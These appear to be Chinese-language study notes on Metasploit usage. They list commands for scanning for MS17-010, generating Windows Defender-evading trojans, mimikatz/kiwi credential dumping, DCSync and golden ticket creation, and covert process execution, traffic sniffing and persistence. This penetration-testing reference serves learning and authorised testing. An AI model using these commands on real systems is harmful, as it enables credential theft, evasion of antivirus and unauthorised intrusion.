辅助模块(auxiliary)
使用
use auxiliary/scanner/smb/smb_ms17_010
查看配置
show opions
设置配置
set lhost
运行
run
nop模块
查看模块
show nops
使用
use nop/x86/single_byte
查看配置
show options
设置配置
set ...
运行
run
encoder模块
通过在msfconsole中查看混淆器
show encoders
在msfvenom和msfconsole都可以使用。
eavsion模块
木马免杀
show evasion ----展示模块
info evasion/windows/windows_defender_exe ----查看模块详细信息
生成免杀木马
use evasion/windows/windows_defender_exe
show options
run
POST模块
后渗透模块
查看有哪些POST模块
show post
利用
use post/.....
show options
run
插件
查看插件
load -l
mimikatz插件
load kiwi #加载mimikatz
help kiwi #查看mimikatz插件帮助
一些有关密码和凭据的命令:
creds_all: #列举所有凭据
creds_kerberos: #列举所有kerberos凭据
creds_msv: #列举所有msv凭据
creds_ssp: #列举所有ssp凭据
creds_tspkg: #列举所有tspkg凭据
creds_wdigest: #列举所有wdigest凭据
dcsync: #通过DCSync检索用户帐户信息
dcsync_ntlm: #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create: #创建黄金票据
kerberos_ticket_list: #列举kerberos票据
kerberos_ticket_purge: #清除kerberos票据
kerberos_ticket_use: #使用kerberos票据
kiwi_cmd: #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam: #dump出lsa的SAM
lsa_dump_secrets: #dump出lsa的密文
password_change: #修改密码
wifi_list: #列出当前用户的wifi配置文件
wifi_list_shared: #列出共享wifi配置文件/编码
隐蔽执行
execute命令
创建傀儡进程
execute -f kali程序 -m -d 目标机器程序 -i
流量劫持
在meterpreter中,查看模块
use
加载sniffer
use sniffer
查看目标机网卡
sniffer_interfaces
监听网卡
sniffer_start 2(网卡编号)
查看数据包详情
sniffer_stats 2
抓取数据包
sniffer_dump 2 /home(保存路径)
persistence后渗透攻击模块
B站大佬:DeelMind